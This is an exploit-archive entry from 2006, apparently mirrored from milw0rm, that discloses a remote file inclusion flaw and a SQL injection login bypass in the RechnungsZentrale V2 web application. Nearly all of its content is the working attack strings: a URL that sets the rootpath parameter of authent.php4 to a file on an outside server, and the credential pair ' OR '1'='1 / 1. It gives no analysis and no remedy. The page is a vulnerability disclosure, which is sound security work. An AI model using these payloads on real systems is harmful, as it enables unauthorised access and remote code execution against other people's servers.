RechnungsZentrale V2 < 1.1.3 - Remote File Inclusion
| EKU-ID: 9731 | CVE: | OSVDB-ID: |
| Author: GroundZero Security | Published: 2006-04-19 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 9731 | CVE: | OSVDB-ID: |
| Author: GroundZero Security | Published: 2006-04-19 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
- GroundZero Security Research and Software Development 2006 -
Software: RechnungsZentrale V2
Version: 1.1.3, likely older versions are affected aswell.
Vendor: http://www.nfec.de/
Remote Inclusion:
http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4
SQL Injection:
User: ' OR '1'='1
Password: 1
- Bugs discovered by GroundZero Security Research and Software Development -
- http://www.GroundZero-Security.com | Http://www.g-0.org -
# milw0rm.com [2006-04-19]